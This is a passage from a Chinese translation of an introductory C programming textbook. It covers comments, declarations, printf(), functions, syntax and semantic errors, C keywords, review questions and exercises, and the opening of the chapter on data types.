数传回操作系统的另一种形式)。 如果浏览旧式的C代码,会发现程序以如下形式开始: main() C90标准勉强接受这种形式,但是C99和C11标准不允许这样写。因此, 即使你使用的编译器允许,也不要这样写。 你还会看到下面这种形式: void main() 一些编译器允许这样写,但是所有的标准都未认可这种写法。因此,编 译器不必接受这种形式,而且许多编译器都不能这样写。需要强调的是,只 要坚持使用标准形式,把程序从一个编译器移至另一个编译器时就不会出什 么问题。 3.注释 /*一个简单的程序*/ 73 在程序中,被/* */两个符号括起来的部分是程序的注释。写注释能让他 人(包括自己)更容易明白你所写的程序。C 语言注释的好处之一是,可将 注释放在任意的地方,甚至是与要解释的内容在同一行。较长的注释可单独 放一行或多行。在/*和*/之间的内容都会被编译器忽略。下面列出了一些有 效和无效的注释形式: /* 这是一条C注释。 */ /* 这也是一条注释, 被分成两行。*/ /* 也可以这样写注释。 */ /* 这条注释无效,因为缺少了结束标记。 C99新增了另一种风格的注释,普遍用于C++和Java。这种新风格使用// 符号创建注释,仅限于单行。 // 这种注释只能写成一行。 int rigue; // 这种注释也可置于此。 因为一行末尾就标志着注释的结束,所以这种风格的注释只需在注释开 始处标明//符号即可。 这种新形式的注释是为了解决旧形式注释存在的潜在问题。假设有下面 的代码: /* 希望能运行。 74 */ x = 100; y = 200; /* 其他内容已省略。 */ 
接下来,假设你决定删除第4行,但不小心删掉了第3行(*/)。代码如 下所示: /* 希望能运行。 y = 200; /*其他内容已省略。 */ 现在,编译器把第1行的/*和第4行的*/配对,导致4行代码全都成了注释 (包括应作为代码的那一行)。而//形式的注释只对单行有效,不会导致这 种“消失代码”的问题。 一些编译器可能不支持这一特性。还有一些编译器需要更改设置,才能 支持C99或C11的特性。 考虑到只用一种注释风格过于死板乏味,本书在示例中采用两种风格的 注释。 4.花括号、函数体和块 { ... } 75 程序清单2.1中,花括号把main()函数括起来。一般而言,所有的C函数 都使用花括号标记函数体的开始和结束。这是规定,不能省略。只有花括号 ({})能起这种作用,圆括号(())和方括号([])都不行。 花括号还可用于把函数中的多条语句合并为一个单元或块。如果读者熟 悉Pascal、ADA、Modula-2或者Algol,就会明白花括号在C语言中的作用类 似于这些语言中的begin和end。 5.声明 int num; 程序清单2.1中,这行代码叫作声明(declaration)。声明是C语言最重 要的特性之一。在该例中,声明完成了两件事。其一,在函数中有一个名为 num的变量(variable)。其二,int表明num是一个整数(即,没有小数点或 小数部分的数)。int是一种数据类型。编译器使用这些信息为num变量在内 存中分配存储空间。分号在C语言中是大部分语句和声明的一部分,不像在 Pascal中只是语句间的分隔符。 int是C语言的一个关键字(keyword),表示一种基本的C语言数据类 型。关键字是语言定义的单词,不能做其他用途。例如,不能用int作为函数 名和变量名。但是,这些关键字在该语言以外不起作用,所以把一只猫或一 个可爱的小孩叫int是可以的(尽管某些地方的当地习俗或法律可能不允 许)。 示例中的num是一个标识符(identifier),也就一个变量、函数或其他 实体的名称。因此,声明把特定标识符与计算机内存中的特定位置联系起 来,同时也确定了储存在某位置的信息类型或数据类型。 在C语言中,所有变量都必须先声明才能使用。这意味着必须列出程序 中用到的所有变量名及其类型。 以前的C语言,还要求把变量声明在块的顶部,其他语句不能在任何声 76 明的前面。也就是说,main()函数体如下所示: int main() //旧规则 { int doors; int dogs; doors = 5; dogs = 3; // 其他语句 } C99和C11遵循C++的惯例,可以把声明放在块中的任何位置。尽管如 此,首次使用变量之前一定要先声明它。因此,如果编译器支持这一新特 性,可以这样编写上面的代码: int main()      // 目前的C规则 { // 一些语句 int doors; doors = 5; // 第1次使用doors // 其他语句 int dogs; dogs = 3; // 第1次使用dogs 77 // 其他语句 } 为了与旧系统更好地兼容,本书沿用最初的规则(即,把变量声明都写 在块的顶部)。 现在,读者可能有3个问题:什么是数据类型?如何命名?为何要声明 变量?请往下看。 数据类型 C 语言可以处理多种类型的数据,如整数、字符和浮点数。把变量声明 为整型或字符类型,计算机才能正确地储存、读取和解释数据。下一章将详 细介绍C语言中的各种数据类型。 命名 给变量命名时要使用有意义的变量名或标识符(如,程序中需要一个变 量数羊,该变量名应该是sheep_count而不是x3)。如果变量名无法清楚地表 达自身的用途,可在注释中进一步说明。这是一种良好的编程习惯和编程技 巧。 C99和C11允许使用更长的标识符名,但是编译器只识别前63个字符。 对于外部标识符(参阅第12章),只允许使用31个字符。〔以前C90只允许 6个字符,这是一个很大的进步。旧式编译器通常最多只允许使用8个字 符。〕实际上,你可以使用更长的字符,但是编译器会忽略超出的字符。也 就是说,如果有两个标识符名都有63个字符,只有一个字符不同,那么编译 器会识别这是两个不同的名称。如果两个标识符都是64个字符,只有最后一 个字符不同,那么编译器可能将其视为同一个名称,也可能不会。标准并未 定义在这种情况下会发生什么。 可以用小写字母、大写字母、数字和下划线(_)来命名。而且,名称 的第1个字符必须是字符或下划线,不能是数字。表2.1给出了一些示例。 78 表2.1 有效和无效的名称 操作系统和C库经常使用以一个或两个下划线字符开始的标识符(如, _kcab),因此最好避免在自己的程序中使用这种名称。标准标签都以一个 或两个下划线字符开始,如库标识符。这样的标识符都是保留的。这意味 着,虽然使用它们没有语法错误,但是会导致名称冲突。 C语言的名称区分大小写,即把一个字母的大写和小写视为两个不同的 字符。因此,stars和Stars、STARS都不同。 为了让C语言更加国际化,C99和C11根据通用字符名(即UCN)机制添 加了扩展字符集。其中包含了除英文字母以外的部分字符。欲了解详细内 容,请参阅附录B的“参考资料VII:扩展字符支持”。 声明变量的4个理由 一些更老的语言(如,FORTRAN 和 BASIC 的最初形式)都允许直接 使用变量,不必先声明。为何 C语言不采用这种简单易行的方法?原因如 下。 把所有的变量放在一处,方便读者查找和理解程序的用途。如果变量名 都是有意义的(如,taxtate而不是 r),这样做效果很好。如果变量名无法 表述清楚,在注释中解释变量的含义。这种方法让程序的可读性更高。 声明变量会促使你在编写程序之前做一些计划。程序在开始时要获得哪 些信息?希望程序如何输出?表示数据最好的方式是什么? 
声明变量有助于发现隐藏在程序中的小错误,如变量名拼写错误。例 79 如,假设在某些不需要声明就可以直接使用变量的语言中,编写如下语句: RADIUS1 = 20.4; 在后面的程序中,误写成: CIRCUM = 6.28 * RADIUSl; 你不小心把数字1打成小写字母l。这些语言会创建一个新的变量 RADIUSl,并使用该变量中的值(也许是0,也许是垃圾值),导致赋给 CIRCUM的值是错误值。你可能要花很久时间才能查出原因。这样的错误在 C语言中不会发生(除非你很不明智地声明了两个极其相似的变量),因为 编译器在发现未声明的RADIUSl时会报错。 如果事先未声明变量,C程序将无法通过编译。如果前几个理由还不足 以说服你,这个理由总可以让你认真考虑一下了。 如果要声明变量,应该声明在何处?前面提到过,C99之前的标准要求 把声明都置于块的顶部,这样规定的好处是:把声明放在一起更容易理解程 序的用途。C99 允许在需要时才声明变量,这样做的好处是:在给变量赋值 之前声明变量,就不会忘记给变量赋值。但是实际上,许多编译器都还不支 持C99。 6.赋值 num = 1; 程序清单中的这行代码是赋值表达式语句[2]。赋值是C语言的基本操作 之一。该行代码的意思是“把值1赋给变量num”。在执行int num;声明时,编 译器在计算机内存中为变量num预留了空间,然后在执行这行赋值表达式语 句时,把值储存在之前预留的位置。可以给num赋不同的值,这就是num之 所以被称为变量(variable)的原因。注意,该赋值表达式语句从右侧把值 赋到左侧。另外,该语句以分号结尾,如图2.2所示。 80 图2.2 赋值是C语言中的基本操作之一 7.printf()函数 printf("I am a simple "); printf("computer.\n"); printf("My favorite number is %d because it is first.\n", num); 这3行都使用了C语言的一个标准函数:printf()。圆括号表明printf是一 个函数名。圆括号中的内容是从main()函数传递给printf()函数的信息。例 如,上面的第1行把I am a simple传递给printf()函数。该信息被称为参数,或 者更确切地说,是函数的实际参数(actual argument),如图2.3所示。〔在 C语言中,实际参数(简称实参)是传递给函数的特定值,形式参数(简称 形参)是函数中用于储存值的变量。第5章中将详述相关内容。〕printf()函 数用参数来做什么?该函数会查看双引号中的内容,并将其打印在屏幕上。 图2.3 带实参的printf()函数 第1行printf()演示了在C语言中如何调用函数。只需输入函数名,把所需 81 的参数填入圆括号即可。当程序运行到这一行时,控制权被转给已命名的函 数(该例中是printf())。函数执行结束后,控制权被返回至主调函数 (calling function),该例中是main()。 第2行printf()函数的双引号中的\n字符并未输出。这是为什么?\n的意思 是换行。\n组合(依次输入这两个字符)代表一个换行符(newline character)。对于printf()而言,它的意思是“在下一行的最左边开始新的一 行”。也就是说,打印换行符的效果与在键盘按下Enter键相同。既然如此, 为何不在键入printf()参数时直接使用Enter键?因为编辑器可能认为这是直接 的命令,而不是储存在在源代码中的指令。换句话说,如果直接按下Enter 键,编辑器会退出当前行并开始新的一行。但是,换行符仅会影响程序输出 的显示格式。 换行符是一个转义序列(escape sequence)。转义序列用于代表难以表 示或无法输入的字符。如,\t代表Tab键,\b代表Backspace键(退格键)。每 个转义序列都以反斜杠字符(\)开始。我们在第3章中再来探讨相关内容。 这样,就解释了为什么3行printf()语句只打印出两行:第1个printf()打印 的内容中不含换行符,但是第2和第3个printf()中都有换行符。 第3个printf()还有一些不明之处:参数中的%d在打印时有什么作用?先 来看该函数的输出: My favorite number is 1 because it is first. 对比发现,参数中的%d被数字1代替了,而1就是变量num的值。%d相 当于是一个占位符,其作用是指明输出num值的位置。该行和下面的BASIC 语句很像: PRINT "My favorite number is "; num; " because it is first." 
实际上,C语言的printf()比BASIC的这条语句做的事情多一些。%提醒 程序,要在该处打印一个变量,d表明把变量作为十进制整数打印。printf() 82 函数名中的f提醒用户,这是一种格式化打印函数。printf()函数有多种打印 变量的格式,包括小数和十六进制整数。后面章节在介绍数据类型时,会详 细介绍相关内容。 8.return语句 return 0; return语句[3]是程序清单2.1的最后一条语句。int main(void)中的int表明 main()函数应返回一个整数。C标准要求main()这样做。有返回值的C函数要 有return语句。该语句以return关键字开始,后面是待返回的值,并以分号结 尾。如果遗漏 main()函数中的 return 语句,程序在运行至最外面的右花括号 (})时会返回0。因此,可以省略main()函数末尾的return语句。但是,不要 在其他有返回值的函数中漏掉它。因此,强烈建议读者养成在 main()函数中 保留 return 语句的好习惯。在这种情况下,可将其看作是统一代码风格。但 对于某些操作系统(包括Linux和UNIX),return语句有实际的用途。第11章 再详述这个主题。 83 2.3 简单程序的结构 在看过一个具体的程序示例后,我们来了解一下C程序的基本结构。程 序由一个或多个函数组成,必须有 main()函数。函数由函数头和函数体组 成。函数头包括函数名、传入该函数的信息类型和函数的返回类型。通过函 数名后的圆括号可识别出函数,圆括号里可能为空,可能有参数。函数体被 花括号括起来,由一系列语句、声明组成,如图2.4所示。本章的程序示例 中有一条声明,声明了程序使用的变量名和类型。然后是一条赋值表达式语 句,变量被赋给一个值。接下来是3条printf()语句[4],调用printf()函数3次。 最后,main()以return语句结束。 图2.4 函数包含函数头和函数体 简而言之,一个简单的C程序的格式如下: 84 #include <stdio.h> int main(void) { 语句 return 0; } (大部分语句都以分号结尾。) 85 2.4 提高程序可读性的技巧 编写可读性高的程序是良好的编程习惯。可读性高的程序更容易理解, 以后也更容易修改和更正。提高程序的可读性还有助于你理清编程思路。 前面介绍过两种提高程序可读性的技巧:选择有意义的函数名和写注 释。注意,使用这两种技巧时应相得益彰,避免重复啰嗦。如果变量名是 width,就不必写注释说明该变量表示宽度,但是如果变量名是 video_routine_4,就要解释一下该变量名的含义。 提高程序可读性的第3个技巧是:在函数中用空行分隔概念上的多个部 分。例如,程序清单2.1中用空行把声明部分和程序的其他部分区分开来。C 语言并未规定一定要使用空行,但是多使用空行能提高程序的可读性。 提高程序可读性的第4个技巧是:每条语句各占一行。同样,这也不是 C语言的要求。C语言的格式比较自由,可以把多条语句放在一行,也可以 每条语句独占一行。下面的语句都没问题,但是不好看: int main( void ) { int four; four = 4 ; printf( "%d\n", four); return 0;} 分号告诉编译器一条语句在哪里结束、下一条语句在哪里开始。如果按 照本章示例的约定来编写代码(见图2.5),程序的逻辑会更清晰。 86 图2.5 提高程序的可读性 87 2.5 进一步使用C 本章的第1个程序相当简单,下面的程序清单2.2也不太难。 程序清单2.2 fathm_ft.c程序 // fathm_ft.c -- 把2音寻转换成英寸 #include <stdio.h> int main(void) { int feet, fathoms; fathoms = 2; feet = 6 * fathoms; printf("There are %d feet in %d fathoms!\n", feet, fathoms); printf("Yes, I said %d feet!\n", 6 * fathoms); return 0; } 与程序清单2.1相比,以上代码有什么新内容?这段代码提供了程序描 述,声明了多个变量,进行了乘法运算,并打印了两个变量的值。下面我们 更详细地分析这些内容。 2.5.1 程序说明 程序在开始处有一条注释(使用新的注释风格),给出了文件名和程序 的目的。写这种程序说明很简单、不费时,而且在以后浏览或打印程序时很 88 有帮助。 2.5.2 多条声明 接下来,程序在一条声明中声明了两个变量,而不是一个变量。为此, 要在声明中用逗号隔开两个变量(feet和fathoms)。也就是说, int feet, fathoms; 和 int feet; int fathoms; 等价。 2.5.3 乘法 然后,程序进行了乘法运算。利用计算机强大的计算能力来计算 6 乘以 2。C 语言和许多其他语言一样,用*表示乘法。因此,语句 feet = 6 * fathoms; 的意思是“查找变量fathoms的值,用6乘以该值,并把计算结果赋给变量 feet”。 2.5.4 打印多个值 最后,程序以新的方式使用printf()函数。如果编译并运行该程序,输出 应该是这样: There are 12 feet in 2 fathoms! Yes, I said 12 feet! 89 程序的第1个printf()中进行了两次替换。双引号号后面的第1个变量 (feet)替换了双引号中的第1个%d;双引号号后面的第2个变量(fathoms) 替换了双引号中的第2个%d。注意,待输出的变量列于双引号的后面。还要 注意,变量之间要用逗号隔开。 第2个printf()函数说明待打印的值不一定是变量,只要可求值得出合适 类型值的项即可,如6 *fathoms。 该程序涉及的范围有限,但它是把音寻[5]转换成英寸程序的核心部 分。我们还需要把其他值通过交互的方式赋给feet,其方法将在后面章节中 介绍。 90 2.6 多个函数 到目前为止,介绍的几个程序都只使用了printf()函数。程序清单2.3演 示了除main()以外,如何把自己的函数加入程序中。 程序清单2.3 two_func.c程序 //* two_func.c -- 一个文件中包含两个函数 */ #include <stdio.h> void butler(void); /* ANSI/ISO C函数原型 */ int main(void) { printf("I will summon the butler function.\n"); butler(); printf("Yes. Bring me some tea and writeable DVDs.\n"); return 0; } void butler(void) /* 函数定义开始 */ { printf("You rang, sir?\n"); } 该程序的输出如下: 91 I will summon the butler function. You rang, sir? Yes.Bring me some tea and writeable DVDs. 
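顺带一提,同一个函数可以被调用任意多次。下面这个改动后的版本仅作示意,唯一的改动是多调用了一次 butler():

/* 示意:在程序清单2.3的基础上多调用一次butler() */
#include <stdio.h>
void butler(void);        /* ANSI/ISO C函数原型 */
int main(void)
{
    printf("I will summon the butler function.\n");
    butler();
    printf("Yes. Bring me some tea and writeable DVDs.\n");
    butler();             /* 再次调用同一个函数 */
    return 0;
}
void butler(void)         /* 函数定义开始 */
{
    printf("You rang, sir?\n");
}

这样,"You rang, sir?" 会被打印两次:一次在 main() 的两条消息之间,一次在末尾。现在回到程序清单2.3本身。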
butler()函数在程序中出现了3次。第1次是函数原型(prototype),告知 编译器在程序中要使用该函数;第 2 次以函数调用(function call)的形式出 现在 main()中;最后一次出现在函数定义(function definition)中,函数定 义即是函数本身的源代码。下面逐一分析。 C90 标准新增了函数原型,旧式的编译器可能无法识别(稍后我们将介 绍,如果使用这种编译器应该怎么做)。函数原型是一种声明形式,告知编 译器正在使用某函数,因此函数原型也被称为函数声明(function declaration)。函数原型还指明了函数的属性。例如,butler()函数原型中的 第1个void表明,butler()函数没有返回值(通常,被调函数会向主调函数返 回一个值,但是 bulter()函数没有)。第 2 个 void (butler(void)中的 void) 的意思是 butler()函数不带参数。因此,当编译器运行至此,会检查butler() 是否使用得当。注意,void在这里的意思是“空的”,而不是“无效”。 早期的C语言支持一种更简单的函数声明,只需指定返回类型,不用描 述参数: void butler(); 早期的C代码中的函数声明就类似上面这样,不是现在的函数原型。 C90、C99 和C11 标准都承认旧版本的形式,但是也表明了会逐渐淘汰这种 过时的写法。如果要使用以前写的 C代码,就需要把旧式声明转换成函数原 型。本书在后面的章节会继续介绍函数原型的相关内容。 接下来我们继续分析程序。在 main()中调用 butler()很简单,写出函数 名和圆括号即可。当butler()执行完毕后,程序会继续执行main()中的下一条 语句。 92 程序的最后部分是 butler()函数的定义,其形式和 main()相同,都包含 函数头和用花括号括起来的函数体。函数头重述了函数原型的信息:bulter() 不带任何参数,且没有返回值。如果使用老式编译器,请去掉圆括号中的 void。 这里要注意,何时执行 butler()函数取决于它在 main()中被调用的位 置,而不是 butler()的定义在文件中的位置。例如,把 butler()函数的定义放 在 main()定义之前,不会改变程序的执行顺序, butler()函数仍然在两次 printf()调用之间被调用。记住,无论main()在程序文件处于什么位置,所有 的C程序都从main()开始执行。但是,C的惯例是把main()放在开头,因为它 提供了程序的基本框架。 C标准建议,要为程序中用到的所有函数提供函数原型。标准include文 件(包含文件)为标准库函数提供可函数原型。例如,在C标准中,stdio.h 文件包含了printf()的函数原型。第6章最后一个示例演示了如何使用带返回 值的函数,第9章将详细全面地介绍函数。 93 2.7 调试程序 现在,你可以编写一个简单的 C 程序,但是可能会犯一些简单的错 误。程序的错误通常叫做 bug,找出并修正错误的过程叫做调试(debug)。 程序清单2.4是一个有错误的程序,看看你能找出几处。 程序清单2.4 nogood.c程序 /* nogood.c -- 有错误的程序 */ #include <stdio.h> int main(void) ( int n, int n2, int n3; /* 该程序有多处错误 n = 5; n2 = n * n; n3 = n2 * n2; printf("n = %d, n squared = %d, n cubed = %d\n", n,  n2, n3) return 0; ) 2.7.1 语法错误 程序清单 2.4 中有多处语法错误。如果不遵循 C 语言的规则就会犯语法 94 错误。这类似于英文中的语法错误。例如,看看这个句子:Bugs frustrate be can[6]。该句子中的英文单词都是有效的单词(即,拼写正确),但是并未 按照正确的顺序组织句子,而且用词也不妥。C语言的语法错误指的是,把 有效的C符号放在错误的地方。 nogood.c程序中有哪些错误?其一,main()函数体使用圆括号来代替花 括号。这就是把C符号用错了地方。其二,变量声明应该这样写: int n, n2, n3; 或者,这样写: int n; int n2; int n3; 其三,main()中的注释末尾漏掉了*/(另一种修改方案是,用//替 换/*)。最后,printf()语句末尾漏掉了分号。 如何发现程序的语法错误?首先,在编译之前,浏览源代码看是否能发 现一些明显的错误。接下来,查看编译器是否发现错误,检查程序的语法错 误是它的工作之一。在编译程序时,编译器发现错误会报告错误信息,指出 每一处错误的性质和具体位置。 尽管如此,编译器也有出错的时候。也许某处隐藏的语法错误会导致编 译器误判。例如,由于nogood.c程序未正确声明n2和n3,会导致编译器在使 用这些变量时发现更多问题。实际上,有时不用把编译器报告的所有错误逐 一修正,仅修正第 1 条或前几处错误后,错误信息就会少很多。继续这样 做,直到编译器不再报错。编译器另一个常见的毛病是,报错的位置比真正 的错误位置滞后一行。例如,编译器在编译下一行时才会发现上一行缺少分 号。因此,如果编译器报错某行缺少分号,请检查上一行。 95 2.7.2 语义错误 语义错误是指意思上的错误。例如,考虑这个句子:Scornful derivatives sing greenly(轻蔑的衍生物不熟练地唱歌)。句中的形容词、名 词、动词和副词都在正确的位置上,所以语法正确。但是,却让人不知所 云。在C语言中,如果遵循了C规则,但是结果不正确,那就是犯了语义错 误。程序示例中有这样的错误: n3 = n2 * n2; 此处,n3原意表示n的3次方,但是代码中的n3被设置成n的4次方(n2 = n * n)。 编译器无法检测语义错误,因为这类错误并未违反 C语言的规则。编译 器无法了解你的真正意图,所以你只能自己找出这些错误。例如,假设你修 正了程序的语法错误,程序应该如程序清单2.5所示: 程序清单2.5 stillbad.c程序 /* stillbad.c -- 修复了语法错误的程序 */ #include <stdio.h> int main(void) { int n, n2, n3; /* 该程序有一个语义错误 */ n = 5; n2 = n * n; n3 = n2 * n2; 96 printf("n = %d, n squared = %d, n cubed = %d\n", n,  n2, n3); return 0; } 该程序的输出如下: n = 5, n squared = 25, n cubed = 625 如果对简单的立方比较熟悉,就会注意到 625 不对。下一步是跟踪程序 的执行步骤,找出程序如何得出这个答案。对于本例,通过查看代码就会发 现其中的错误,但是,还应该学习更系统的方法。方法之一是,把自己想象 成计算机,跟着程序的步骤一步一步地执行。下面,我们来试试这种方法。 main()函数体一开始就声明了3个变量:n、n2、n3。你可以画出3个盒子 并把变量名写在盒子上来模拟这种情况(见图2.6)。接下来,程序把5赋给 变量n。你可以在标签为n的盒子里写上5。接着,程序把n和n相乘,并把乘 积赋给n2。因此,查看标签为n的盒子,其值是5,5乘以5得25,于是把25放 进标签为 n2 的盒子里。为了模拟下一条语句(n3 = n2 * n2),查看 n2 盒 子,发现其值是 25。25乘以25得625,把625放进标签为n3的盒子。原来如 此!程序中计算的是n2的平方,不是用n2乘以n得到n的3次方。 对于上面的程序示例,检查程序的过程可能过于繁琐。但是,用这种方 法一步一步查看程序的执行情况,通常是发现程序问题所在的良方。 97 图2.6 跟踪程序的执行步骤 2.7.3 程序状态 通过逐步跟踪程序的执行步骤,并记录每个变量,便可监视程序的状 态。程序状态(program state)是在程序的执行过程中,某给定点上所有变 量值的集合。它是计算机当前状态的一个快照。 我们刚刚讨论了一种跟踪程序状态的方法:自己模拟计算机逐步执行程 序。但是,如果程序中有10000次循环,这种方法恐怕行不通。不过,你可 
以跟踪一小部分循环,看看程序是否按照预期的方式执行。另外,还要考虑 一种情况:你很可能按照自己所想去执行程序,而不是根据实际写出来的代 码去执行。因此,要尽量忠实代码来模拟。 定位语义错误的另一种方法是:在程序中的关键点插入额外的 printf() 语句,以监视制定变量值的变化。通过查看值的变化可以了解程序的执行情 况。对程序的执行满意后,便可删除额外的 printf()语句,然后重新编译。 检测程序状态的第3种方法是使用调试器。调试器(debugger)是一种 程序,让你一步一步运行另一个程序,并检查该程序变量的值。调试器有不 98 同的使用难度和复杂度。较高级的调试器会显示正在执行的源代码行号。这 在检查有多条执行路径的程序时很方便,因为很容易知道正在执行哪条路 径。如果你的编译器自带调试器,现在可以花点时间学会怎么使用它。例 如,试着调试一下程序清单2.4。 99 2.8 关键字和保留标识符 关键字是C语言的词汇。它们对C而言比较特殊,不能用它们作为标识 符(如,变量名)。许多关键字用于指定不同的类型,如 int。还有一些关 键字(如,if)用于控制程序中语句的执行顺序。在表 2.2 中所列的C语言关 键字中,粗体表示的是C90标准新增的关键字,斜体表示的C99标准新增的 关键字,粗斜体表示的是C11标准新增的关键字。 表2.2 ISO C关键字 续表 如果使用关键字不当(如,用关键字作为变量名),编译器会将其视为 语法错误。还有一些保留标识符(reserved identifier),C语言已经指定了它 们的用途或保留它们的使用权,如果你使用这些标识符来表示其他意思会导 致一些问题。因此,尽管它们也是有效的名称,不会引起语法错误,也不能 随便使用。保留标识符包括那些以下划线字符开头的标识符和标准库函数 名,如printf()。 100 2.9 关键概念 编程是一件富有挑战性的事情。程序员要具备抽象和逻辑的思维,并谨 慎地处理细节问题(编译器会强迫你注意细节问题)。平时和朋友交流时, 可能用错几个单词,犯一两个语法错误,或者说几句不完整的句子,但是对 方能明白你想说什么。而编译器不允许这样,对它而言,几乎正确仍然是错 误。 编译器不会在下面讲到的概念性问题上帮助你。因此,本书在这一章中 介绍一些关键概念帮助读者弥补这部分的内容。 在本章中,读者的目标应该是理解什么是C程序。可以把程序看作是你 希望计算机如何完成任务的描述。编译器负责处理一些细节工作,例如把你 要计算机完成的任务转换成底层的机器语言(如果从量化方面来解释编译器 所做的工作,它可以把1KB的源文件创建成60KB的可执行文件;即使是一 个很简单的C程序也要用大量的机器语言来表示)。由于编译器不具有真正 的智能,所以你必须用编译器能理解的术语表达你的意图,这些术语就是C 语言标准规定的形式规则(尽管有些约束,但总比直接用机器语言方便得 多)。 编译器希望接收到特定格式的指令,我们在本章已经介绍过。作为程序 员的任务是,在符合 C标准的编译器框架中,表达你希望程序应该如何完成 任务的想法。 101 2.10 本章小结 C程序由一个或多个C函数组成。每个C程序必须包含一个main()函数, 这是C程序要调用的第1个函数。简单的函数由函数头和后面的一对花括号 组成,花括号中是由声明、语句组成的函数体。 在C语言中,大部分语句都以分号结尾。声明为变量创建变量名和标识 该变量中储存的数据类型。变量名是一种标识符。赋值表达式语句把值赋给 变量,或者更一般地说,把值赋给存储空间。函数表达式语句用于调用指定 的已命名函数。调用函数执行完毕后,程序会返回到函数调用后面的语句继 续执行。 printf()函数用于输出想要表达的内容和变量的值。 一门语言的语法是一套规则,用于管理语言中各有效语句组合在一起的 方式。语句的语义是语句要表达的意思。编译器可以检测出语法错误,但是 程序里的语义错误只有在编译完之后才能从程序的行为中表现出来。检查程 序是否有语义错误要跟踪程序的状态,即程序每执行一步后所有变量的值。 最后,关键字是C语言的词汇。 102 2.11 复习题 复习题的参考答案在附录A中。 1.C语言的基本模块是什么? 2.什么是语法错误?写出一个英语例子和C语言例子。 3.什么是语义错误?写出一个英语例子和C语言例子。 4.Indiana Sloth编写了下面的程序,并征求你的意见。请帮助他评定。 include studio.h int main{void} /* 该程序打印一年有多少周 /* ( int s s := 56; print(There are s weeks in a year.); return 0; 5.假设下面的4个例子都是完整程序中的一部分,它们都输出什么结 果? a. printf("Baa Baa Black Sheep."); printf("Have you any wool?\n"); b. printf("Begone!\nO creature of lard!\n"); c.printf("What?\nNo/nfish?\n"); 103 d.int num; num = 2; printf("%d + %d = %d", num, num, num + num); 6.在main、int、function、char、=中,哪些是C语言的关键字? 7.如何以下面的格式输出变量words和lines的值(这里,3020和350代表 两个变量的值)? There were 3020 words and 350 lines. 8.考虑下面的程序: #include <stdio.h> int main(void) { int a, b; a = 5; b = 2; /* 第7行 */ b = a; /* 第8行 */ a = b; /* 第9行 */ printf("%d %d\n", b, a); return 0; } 104 请问,在执行完第7、第8、第9行后,程序的状态分别是什么? 9.考虑下面的程序: #include <stdio.h> int main(void) { int x, y; x = 10; y = 5;   /* 第7行 */ y = x + y; /*第8行*/ x = x*y;  /*第9行*/ printf("%d %d\n", x, y); return 0; } 请问,在执行完第7、第8、第9行后,程序的状态分别是什么? 105 2.12 编程练习 纸上得来终觉浅,绝知此事要躬行。读者应该试着编写一两个简单的程 序,体会一下编写程序是否和阅读本章介绍的这样轻松。题目中会给出一些 建议,但是应该尽量自己思考这些问题。一些编程答案练习的答案可在出版 商网站获取。 1.编写一个程序,调用一次 printf()函数,把你的姓名打印在一行。再调 用一次 printf()函数,把你的姓名分别打印在两行。然后,再调用两次printf() 函数,把你的姓名打印在一行。输出应如下所示(当然要把示例的内容换成 你的姓名): 2.编写一个程序,打印你的姓名和地址。 3.编写一个程序把你的年龄转换成天数,并显示这两个值。这里不用考 虑闰年的问题。 4.编写一个程序,生成以下输出: For he's a jolly good fellow! For he's a jolly good fellow! For he's a jolly good fellow! Which nobody can deny! 
除了 main()函数以外,该程序还要调用两个自定义函数:一个名为 106 jolly(),用于打印前 3 条消息,调用一次打印一条;另一个函数名为 deny(),打印最后一条消息。 5.编写一个程序,生成以下输出: Brazil, Russia, India, China India, China, Brazil, Russia 除了main()以外,该程序还要调用两个自定义函数:一个名为br(),调 用一次打印一次“Brazil, Russia”;另一个名为ic(),调用一次打印一次“India, China”。其他内容在main()函数中完成。 6.编写一个程序,创建一个整型变量toes,并将toes设置为10。程序中还 要计算toes的两倍和toes的平方。该程序应打印3个值,并分别描述以示区 分。 7.许多研究表明,微笑益处多多。编写一个程序,生成以下格式的输 出: Smile!Smile!Smile! Smile!Smile! Smile! 该程序要定义一个函数,该函数被调用一次打印一次“Smile!”,根据程 序的需要使用该函数。 8.在C语言中,函数可以调用另一个函数。编写一个程序,调用一个名 为one_three()的函数。该函数在一行打印单词“one”,再调用第2个函数 two(),然后在另一行打印单词“three”。two()函数在一行显示单词“two”。 main()函数在调用 one_three()函数前要打印短语“starting now:”,并在调用完 107 毕后显示短语“done!”。因此,该程序的输出应如下所示: starting now: one two three done! [1].原书图中叙述有误。根据C11标准,C语言有6种语句,已在图中更正。 ——译者注 [2].C语言是通过赋值运算符而不是赋值语句完成赋值操作。根据C标准,C 语言并没有所谓的“赋值语句”,本书及一些其他书籍中提到的“赋值语句”实 际上是表达式语句(C语言的6种基本语句之一)。本书把“赋值语句”均译 为“赋值表达式语句”,以提醒初学者注意。——译者注 [3].在C语言中,return语句是一种跳转语句。——译者注 [4].市面上许多书籍(包括本书)都把这种语句叫作“函数调用语句”,但是 历年的C标准中从来没有函数调用语句!值得一提的是,函数调用本身是一 个表达式,圆括号是运算符,圆括号左边的函数名是运算对象。在C11标准 中,这样的表达式是一种后缀表达式。在表达式末尾加上分号,就成了表达 式语句。请初学者注意,这样的“函数调用语句”实质是表达式语句。本书的 错误之处已在翻译过程中更正。——译者注 [5].音寻,也称为寻。航海用的深度单位,1英寻=6英尺=1.8米,通常用在海 图上测量水深。——译者注 [6].要理解该句子存在语法错误,需要具备基本的英文语法知识。——译者 注 108 第3章 数据和C 本章介绍以下内容: 关键字:int 、short、long、unsigned、char、float、double、_Bool、 _Complex、_Imaginary 运算符:sizeof() 函数:scanf() 整数类型和浮点数类型的区别 如何书写整型和浮点型常数,如何声明这些类型的变量 如何使用printf()和scanf()函数读写不同类型的值 程序离不开数据。把数字、字母和文字输入计算机,就是希望它利用这 些数据完成某些任务。例如,需要计算一份利息或显示一份葡萄酒商的排序 列表。本章除了介绍如何读取数据外,还将教会读者如何操控数据。 C 语言提供两大系列的多种数据类型。本章详细介绍两大数据类型:整 数类型和浮点数类型,讲解这些数据类型是什么、如何声明它们、如何以及 何时使用它们。除此之外,还将介绍常量和变量的区别。读者很快就能看到 第1个交互式程序。 109 3.1 示例程序 本章仍从一个简单的程序开始。如果发现有不熟悉的内容,别担心,我 们稍后会详细解释。该程序的意图比较明了,请试着编译并运行程序清单 3.1中的源代码。为了节省时间,在输入源代码时可省略注释。 程序清单3.1 platinum.c程序 /* platinum.c -- your weight in platinum */ #include <stdio.h> int main(void) { float weight;  /* 你的体重       */ float value;  /* 相等重量的白金价值   */ printf("Are you worth your weight in platinum?\n"); printf("Let's check it out.\n"); printf("Please enter your weight in pounds: "); /* 获取用户的输入             */ scanf("%f", &weight); /* 